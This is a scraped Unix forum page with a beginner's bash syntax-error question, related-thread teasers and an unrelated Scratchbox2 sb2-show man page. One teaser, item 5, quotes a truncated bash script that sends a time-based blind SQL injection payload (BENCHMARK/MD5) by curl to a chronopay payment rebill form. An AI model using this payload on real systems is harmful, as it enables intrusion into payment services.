Sponsored Content
Top Forums Shell Programming and Scripting Syntax error near unexpected token '(' Post 302853639 by sgradywhite on Sunday 15th of September 2013 02:11:34 PM
Old 09-15-2013
I did compile this file and it didn't show any error but when I execute it then it gave me error. I'm running this code in Unix. This is my first time by the way.

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

sh syntax error unexpected token done

I'm getting the following error: line 21: syntax error near unexpected token `done` line 21: `done` and I haven't been able to figure out why. Here is my code #!/bin/sh if ; then echo 'Usage: rename getexp/replStr ' exit 0 fi arg = $1 shift while ; do (5 Replies)
Discussion started by: NullPointer
5 Replies

2. Shell Programming and Scripting

Syntax error near unexpected token `('

Guys , This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script. Below is my original script pasted. #!/bin/bash Script Creation Date 01/21/2010 Author baraghun ... (7 Replies)
Discussion started by: raghunsi
7 Replies

3. UNIX for Advanced & Expert Users

syntax error near unexpected token '{

Hi, I am running the following script through cygwin and getting below mentioned error. ******************************************* #!/bin/sh # constants WORK_DIR="deploy" INFOFILE="deploy.info" INTROFILE="Intro.sh" CMGMT_PKG="com.kintana.cmgmt.deploy" DEPLOY_PREFIX="mitg" ... (2 Replies)
Discussion started by: MandyR
2 Replies

4. Shell Programming and Scripting

syntax error near unexpected token `='

Hi all, This is a script which converts hex to bin. However am finding an error while executing syntax error near unexpected token `=' `($hexfile, $binfile) = @ARGV;' I am running using ./fil.pl <hexfile> <binfile> ################################################### # # this script... (3 Replies)
Discussion started by: jaango123
3 Replies

5. Shell Programming and Scripting

What do I do here? #!/bin/bash payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)# hash=`echo -n $payload md5sum tr -d 'n' sed 'ss-sg' md5sum tr -d 'n' sed 'ss-sg'` curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill... (2 Replies)
Discussion started by: iiiiiiiiiii
2 Replies

6. Shell Programming and Scripting

Syntax error near unexpected token `else'

Hi, I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script : #!/bin/bash cd... (6 Replies)
Discussion started by: Aryan12345
6 Replies

7. Shell Programming and Scripting

Syntax error near unexpected token

Hi all, I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction. count=$((1)) for item in `cat test1.txt` printf %s `sed -n $((count))p test2.txt` > test3.txt count=$((count+1)) do something done I get ; ./why.sh: line 3:... (14 Replies)
Discussion started by: y33t
14 Replies

8. How to Post in the The UNIX and Linux Forums

I have 2 files like a.txt and b.txt and the content is as below cat a.txt 810750125 117780 /BSCSQAT4A/bscsqat4a/lib/jar/wclt_common.jar 1803152428 13300 /BSCSQAT4A/bscsqat4a/lib/jar/WFMSSupportTool.jar 2663502779 67049 /BSCSQAT4A/bscsqat4a/lib/jar/wma.jar 687942896 665272... (1 Reply)
Discussion started by: ranabhavish
1 Replies

9. UNIX for Beginners Questions & Answers

Syntax error near unexpected token

Dears, While executing the below script im getting the error at line 30. Please let me know what changes to be done to fix this. test.sh: line 30: syntax error near unexpected token `done' test.sh: line 30: ` done ' #!/bin/sh # Rev. PA1 # author: eillops # date: 26-04-2018 # #... (1 Reply)
Discussion started by: Kamesh G
1 Replies

10. Ubuntu

detect_mouse_mvt.sh /home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `(' /home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')' #!/bin/bash # # fh = file('/dev/input/mice') while True: fh.read(3) print 'Mouse... (15 Replies)
Discussion started by: drew77
15 Replies
sb2-show(1)							 sb2-show man page						       sb2-show(1)

NAME
sb2-show - sb2 diagnostics tool SYNOPSIS
sb2-show [-b binary_name ] [-m mode ] [-f function ] [-D ] [-v ] command [parameters] DESCRIPTION
sb2-show is a tool for querying and testing what scratchbox2 does "behind the scenes". The two most common uses are testing path mapping (commands path and which ) and finding out how programs are executed (the exec command). Additionally, there are some commands that are intended to be used internally by scratchbox2 itself, and not so useful for a normal user. sb2-show must be executed inside a scratchbox2 session (see sb2(1) for details about creating sessions) COMMANDS
Common commands: path [path1] [path2] [pathN] Show mapping results for listed pathnames which [path1] [path2].. Show mappings of pathnames, a less verbose variant of the path command (useful when using sb2-show from scripts) exec program_path [arg1] [arg2].. Show how a program would be executed, together with environment modifications. realcwd Show real current working directory (Inside a session /bin/pwd will usually report virtual paths, and this is the only way to deter- mine the real wroking directory). Commands for non-interactive use and debugging of scratchbox2: exec-cmdline file [argv1] [argv2].. show execve() modifications on a single line (does not show full details, useful when using sb2-show from scripts) log-error 'message' Add an error message to the logfile log-warning 'message' Add a warning message to the logfile verify-pathlist-mappings required-fix [ignorelist] Reads list of paths from stdin and checks that all paths will be mapped to a required prefix. This is used by sb2-check-pkg-map- pings, (an internal utility). execluafile filename Load and execute Lua code from file. binarytype realpath detect & show type of program at realpath (which is an already mapped path) var variablename show value of an internal string variable libraryinterface show preload library interface version (the Lua <-> C code interface) qemu-debug-exec file argv0 [argv1] [argv2].. show command line that can be used to start target binary under qemu gdbserver OPTIONS
-v verbose. -b binary_name show using binary_name as name of the calling program -f function show using function as callers name (full name of library or system call) -D Ignore directories while verifying path lists (effective only for the verify-pathlist-mappings command) -t report elapsed time (real time elapsed while executing the command) -x file Load and execute Lua code from file before executing the command. Useful for debugging and tuning lua scripts of sb2. -X file Load and execute Lua code from file after executing the command. Useful for debugging and tuning lua scripts of sb2. -g port use port as qemu gdbserver listening port (default port is 1234). See command qemu-debug-exec EXAMPLES
Show where the /etc directory gets mapped: $ sb2 sb2-show path /etc /etc => /opt/maemo/tools/etc (readonly) (exact results depend on how sb2-init was executed; what mapping mode is the default, etc.) Typically, home directories are not mapped: $ sb2 sb2-show path /home/yourname /home/yourname => /home/yourname In development modes, host-compatible versions of tools are executed: $ sb2 sb2-show exec /bin/ls File /bin/ls Mapped /opt/maemo/tools/bin/ls (readonly) argv[0] /bin/ls ... But in the emulation mode, only target's executables are used. Try also: $ sb2 -e sb2-show exec /bin/ls SEE ALSO
sb2(1), sb2-config(1), sb2-logz(1), sb2-init(1) AUTHOR
Lauri Aarnio 2.2 17 December 2010 sb2-show(1)